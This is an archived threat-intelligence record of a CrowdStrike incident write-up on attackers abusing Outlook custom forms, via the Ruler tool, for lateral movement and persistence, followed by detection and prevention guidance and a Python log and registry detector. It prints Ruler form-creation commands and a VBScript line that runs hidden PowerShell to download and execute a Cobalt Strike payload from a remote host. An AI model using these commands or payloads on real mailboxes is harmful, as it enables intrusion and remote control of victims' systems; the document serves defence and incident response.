{
	"id": "664c1dfe-2762-464c-9dd5-cd040405a282",
	"created_at": "2026-04-06T02:11:49.472335Z",
	"updated_at": "2026-04-10T03:21:25.85771Z",
	"deleted_at": null,
	"sha1_hash": "9ab542938b31476127f7e08454c5a2a76cb2eb03",
	"title": "Using Outlook Forms for Lateral Movement and Persistence - Malware News - Malware Analysis, News and Indicators",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 55584,
	"plain_text": "Using Outlook Forms for Lateral Movement and Persistence -\r\nMalware News - Malware Analysis, News and Indicators\r\nPublished: 2017-07-22 · Archived: 2026-04-06 02:06:46 UTC\r\nBy CrowdStrike Services: Tim Parisi, Doug Clendening and Jai Musunuri\r\nBackground\r\nDuring a recent CrowdStrike Services investigation, we identified an adversary attack method, used for lateral\r\nmovement and persistence, that we have not seen used before. The attack leveraged customized forms – not\r\nmacros – in Microsoft Outlook that allowed Visual Basic code to execute on a system just by opening or\r\npreviewing an email message.\r\nA detailed explanation of the Outlook forms attack can be found in the SensePost article here. This article below\r\ndetails CrowdStrike’s observations responding to an adversary that used this attack, including a high-level walk-through of the adversary’s actions, along with our detection and prevention methods.\r\nWalk-through\r\nShortly after responding to our client’s call, we performed forensic analysis and identified that the adversary had\r\naccessed the client’s single-factor authentication Outlook Web Access (OWA) server using previously harvested\r\ncredentials. With access to the victim’s OWA server, the adversary created custom message forms to a set of users\r\nin the victim organization’s environment. The custom forms, when triggered through an email, allowed the\r\nadversary to execute code on the victim system.\r\nTo create custom forms, the adversary used the Ruler utility. 
In this case, the adversary created a custom Outlook form that enabled VBScript execution and embedded a Cobalt Strike downloader in the email message. Each time an email using the malicious form was sent to the user, the script ran as that user when the message was opened or previewed, giving the adversary shell access with the user’s full read, write and execute permissions on the system.\r\nBelow is a sample Ruler command that creates a custom form from the file “/test/CobaltStrike.txt”, which contained the VBScript to download and launch Cobalt Strike, and then sends an email to trigger the form:\r\n./ruler --email user@victim.com form add --suffix MaliciousForm --input /test/CobaltStrike.txt --send\r\nFigure 1: Sample Ruler command to create the form “MaliciousForm” and send an email to the victim\r\nThe above command performed the following actions:\r\n1. Created the custom form “MaliciousForm” in the “user@victim.com” mailbox\r\n2. Sent an email to “user@victim.com” from the same sender, “user@victim.com”\r\na. The email contained the default Ruler subject of “Invoice [Confidential]”\r\n3. Cobalt Strike was downloaded and executed on the victim system, granting shell access to the adversary\r\nhttps://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746\r\nPage 1 of 3\r\nThe payload embedded in the adversary’s email contained the following VBScript, which downloaded and executed a Cobalt Strike payload (the download host is not shown):\r\nCreateObject(\"WScript.Shell\").Run \"cmd /c powershell.exe -NoP -sta -w hidden -c IEX ((new-object net.webclient).downloadstring('hxxp://:80/updater'))\"\r\nFigure 2: Email payload that is executed on the victim system by the custom form\r\nThe adversary employed this attack as a novel way to move laterally within the environment without traditional RDP or network logons, bypassing the jump box that sat between network segments in the victim organization. 
The adversary also leveraged this attack to maintain persistence in the environment: any mailbox in which the malicious custom form had previously been created could be re-compromised simply by sending it another email, using the following sample command:\r\n./ruler --email user@victim.com form send --suffix MaliciousForm\r\nFigure 3: Sample Ruler command to send an email with a payload to a victim that already has the custom form created in their mailbox\r\nSo how can organizations detect and protect themselves from this?\r\nDetection\r\nOne way to detect this activity is to monitor the IIS logs on the OWA/Exchange server for the Ruler user agent string, which defaults to “ruler”. The user agent is set by the client and an operator can change it, so its absence does not rule Ruler out; pair this check with a baseline of which clients normally reach the Autodiscover and MAPI endpoints. A sample OWA IIS log below shows the adversary accessing the victim’s OWA server with the Ruler utility:\r\ncs-method=POST cs-uri-stem=/autodiscover/autodiscover.xml cs-uri-query=- s-port=444 cs-username=DOMAIN\\account c-ip=192.168.1.1 cs-version=HTTP/1.1 cs(User-Agent)=ruler cs(Referer)=- sc-status=200 sc-substatus=0 sc-win32-status=0 time-taken=31\r\nFigure 4: Sample OWA IIS log showing the Ruler user agent “ruler” being used by the adversary\r\nAnother detection method involves the Windows registry. 
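Both checks in this section, the IIS-log search for the Ruler user agent (Figure 4) and the registry search for custom form mappings that follows (Figure 5), as one added example; this is not code from the CrowdStrike post or from Ruler. It assumes IIS W3C extended logging with a #Fields: header, an allowlist of expected Autodiscover/MAPI clients (EXPECTED_CLIENTS, a placeholder to be rebuilt from your own baseline), and a registry reader that is injected so the same logic runs offline against a snapshot; on Windows, winreg_reader() reads the live HKEY_CURRENT_USER hive of the current user. The log rows and the registry snapshot are constructed, not taken from the incident.

```python
# Added example, not code from the CrowdStrike post or from Ruler: the IIS-log
# check (Figure 4) and the registry check (Figure 5) run over constructed data.
from collections import Counter

BS = chr(92)  # literal backslash, built with chr() so the snippet survives JSON escaping

# Constructed IIS W3C sample ('+' stands for spaces inside the user agent; 444 is
# the Exchange back-end site). Accounts and addresses are invented.
SAMPLE_LOG = f'''#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2017-07-10 03:15:22 10.0.0.5 POST /autodiscover/autodiscover.xml - 444 DOMAIN{BS}jdoe 192.168.1.1 ruler - 200 0 0 31
2017-07-10 03:15:40 10.0.0.5 POST /mapi/emsmdb/ MailboxId=jdoe@victim.com 444 DOMAIN{BS}jdoe 192.168.1.1 ruler - 200 0 0 12
2017-07-10 08:02:01 10.0.0.5 POST /autodiscover/autodiscover.xml - 444 DOMAIN{BS}asmith 10.1.4.22 Microsoft+Office/16.0+(Windows+NT+10.0;+Microsoft+Outlook+16.0.4266;+Pro) - 200 0 0 8
2017-07-10 08:05:13 10.0.0.5 GET /owa/ - 443 DOMAIN{BS}asmith 10.1.4.22 Mozilla/5.0+(Windows+NT+10.0)+Chrome/59.0 - 200 0 0 3
2017-07-10 09:30:44 10.0.0.5 POST /autodiscover/autodiscover.xml - 444 DOMAIN{BS}bwong 203.0.113.9 python-requests/2.18.1 - 200 0 0 15
'''
# Endpoints Ruler talks to: Autodiscover first, then MAPI/HTTP or RPC over HTTP.
MAPI_PATHS = ('/autodiscover/autodiscover.xml', '/mapi/', '/rpc/rpcproxy.dll')
# Hypothetical allowlist of client prefixes expected on those endpoints; rebuild
# it from your own baseline before alerting on anything outside it.
EXPECTED_CLIENTS = ('Microsoft+Office/', 'Microsoft+Outlook', 'Outlook-iOS-Android/',
                    'Apple-iPhone', 'Apple-iPad', 'MacOutlook/')

def parse_w3c(text):
    '''Yield one dict per log row, mapped through the most recent #Fields: header.'''
    fields = None
    for line in text.splitlines():
        if line.startswith('#Fields:'):
            fields = line.split()[1:]
        elif line and not line.startswith('#') and fields:
            parts = line.split()
            if len(parts) == len(fields):  # skip malformed rows rather than mis-map columns
                yield dict(zip(fields, parts))

def scan_iis_log(text):
    '''Flag rows with the Ruler user agent, and other unexpected clients on MAPI/Autodiscover paths.'''
    findings = []
    for row in parse_w3c(text):
        ua = row.get('cs(User-Agent)', '-')
        if ua.lower() == 'ruler':  # Ruler's default UA; the operator can change it
            rule = 'ruler-user-agent'
        elif row['cs-uri-stem'].lower().startswith(MAPI_PATHS) and not ua.startswith(EXPECTED_CLIENTS):
            rule = 'unexpected-client-on-mapi-path'
        else:
            continue
        findings.append({'rule': rule, 'user': row['cs-username'], 'ip': row['c-ip'],
                         'ua': ua, 'path': row['cs-uri-stem'], 'time': row['date'] + ' ' + row['time']})
    return findings

def affected_accounts(findings):
    '''Hits per (account, source IP): whose mailbox was touched, and from where.'''
    return Counter((f['user'], f['ip']) for f in findings)

OFFICE_VERSIONS = ('14.0', '15.0', '16.0')  # Office 2010, 2013, 2016 and later
ACTIONS = ('Compose', 'Read', 'Preview')

def form_key(version, action):
    '''HKCU-relative path of the Custom Forms key for one Office version and action.'''
    return BS.join(('Software', 'Microsoft', 'Office', version, 'Outlook', 'Custom Forms', action))

def winreg_reader():
    '''Reader over the live HKCU hive (Windows only): {name: data} for a key, None if absent.'''
    import winreg
    def read(key_path):
        try:
            key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path)
        except FileNotFoundError:
            return None
        values = {}
        with key:
            for i in range(winreg.QueryInfoKey(key)[1]):  # [1] is the number of values
                name, data, _ = winreg.EnumValue(key, i)
                values[name] = data
        return values
    return read

def snapshot_reader(snapshot):
    '''Offline reader over {key_path: {value_name: data}}, for tests and exported hives.'''
    return lambda key_path: snapshot.get(key_path)

# Constructed snapshot mirroring Figure 5, plus one benign default mapping.
SAMPLE_SNAPSHOT = {
    form_key('16.0', 'Compose'): {'IPM.Note': 'IPM.Note.MaliciousForm'},
    form_key('16.0', 'Read'): {'IPM.Note': 'IPM.Note.MaliciousForm'},
    form_key('16.0', 'Preview'): {'IPM.Note': 'IPM.Note.MaliciousForm'},
    form_key('15.0', 'Read'): {'IPM.Note': 'IPM.Note'},
}

def find_custom_forms(read):
    '''One finding per mapping whose data is not the plain message class it is named for.'''
    findings = []
    for version in OFFICE_VERSIONS:
        for action in ACTIONS:
            for message_class, mapped_to in (read(form_key(version, action)) or {}).items():
                if str(mapped_to).lower() != message_class.lower():
                    findings.append({'version': version, 'action': action,
                                     'class': message_class, 'form': str(mapped_to)})
    return findings

if __name__ == '__main__':
    import sys
    hits = scan_iis_log(SAMPLE_LOG)
    print(hits, dict(affected_accounts(hits)))
    reader = winreg_reader() if sys.platform == 'win32' else snapshot_reader(SAMPLE_SNAPSHOT)
    print(find_custom_forms(reader))
```

The registry rule is deliberately broader than the text: it flags any mapping whose data differs from the message class it is named for, not only IPM.Note, so custom forms installed for other classes surface too; triage the form names, because legitimately deployed forms look the same. For users who are not logged on, the same logic applies to their NTUSER.DAT hive once it is loaded or exported.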
Custom forms can be identified by searching the registry under Outlook’s “Custom Forms” keys for values whose data is anything other than the plain “IPM.Note” class. In the example below, the Custom Forms Compose, Read and Preview keys each carry the value “IPM.Note.MaliciousForm”. The “16.0” path component is Office 2016; Office 2013 and 2010 use “15.0” and “14.0”, and because the keys live in HKEY_CURRENT_USER, checking a user who is not logged on means loading that user’s NTUSER.DAT hive:\r\nKey: [HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Custom Forms\\Compose]\r\nName: IPM.Note\r\nType: String\r\nValue: IPM.Note.MaliciousForm\r\nKey: [HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Custom Forms\\Read]\r\nName: IPM.Note\r\nType: String\r\nValue: IPM.Note.MaliciousForm\r\nKey: [HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Custom Forms\\Preview]\r\nName: IPM.Note\r\nType: String\r\nValue: IPM.Note.MaliciousForm\r\nFigure 5: Registry keys and values that show a custom form is being used on the system when composing, reading or previewing an email\r\nLastly, if the adversary does not change the default Ruler subject, SMTP traffic that contains the default subject of “Invoice [Confidential]” should be reviewed, and mail monitoring rules should alert on messages carrying that subject. Like the user agent, the subject is a default the operator can change, so treat it as a cheap check rather than a reliable one.\r\nPrevention\r\nTo perform this attack, the adversary needed to authenticate to the Microsoft Exchange server, which in this case required only a single factor. Organizations should ensure that every part of their user base, whether corporate or third-party, uses two-factor authentication for email access.\r\nIn addition, organizations should implement an advanced endpoint protection platform, such as CrowdStrike Falcon®, that leverages machine learning to identify anomalies and perform heuristics, in addition to detecting and preventing known and unknown threats in real time. 
An endpoint agent such as CrowdStrike Falcon would have prevented the Cobalt Strike payload from successfully executing on the system, and prevented the adversary from moving laterally throughout the victim environment.\r\nLearn more about detecting and preventing threats in real time by visiting the CrowdStrike Falcon platform page, or see CrowdStrike’s pre- and post-incident response services.\r\nArticle Link: https://www.crowdstrike.com/blog/using-outlook-forms-lateral-movement-persistence/\r\nSource: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746"
	],
	"report_names": [
		"13746"
	],
	"threat_actors": [],
	"ts_created_at": 1775441509,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9ab542938b31476127f7e08454c5a2a76cb2eb03.pdf",
		"text": "https://archive.orkl.eu/9ab542938b31476127f7e08454c5a2a76cb2eb03.txt",
		"img": "https://archive.orkl.eu/9ab542938b31476127f7e08454c5a2a76cb2eb03.jpg"
	}
}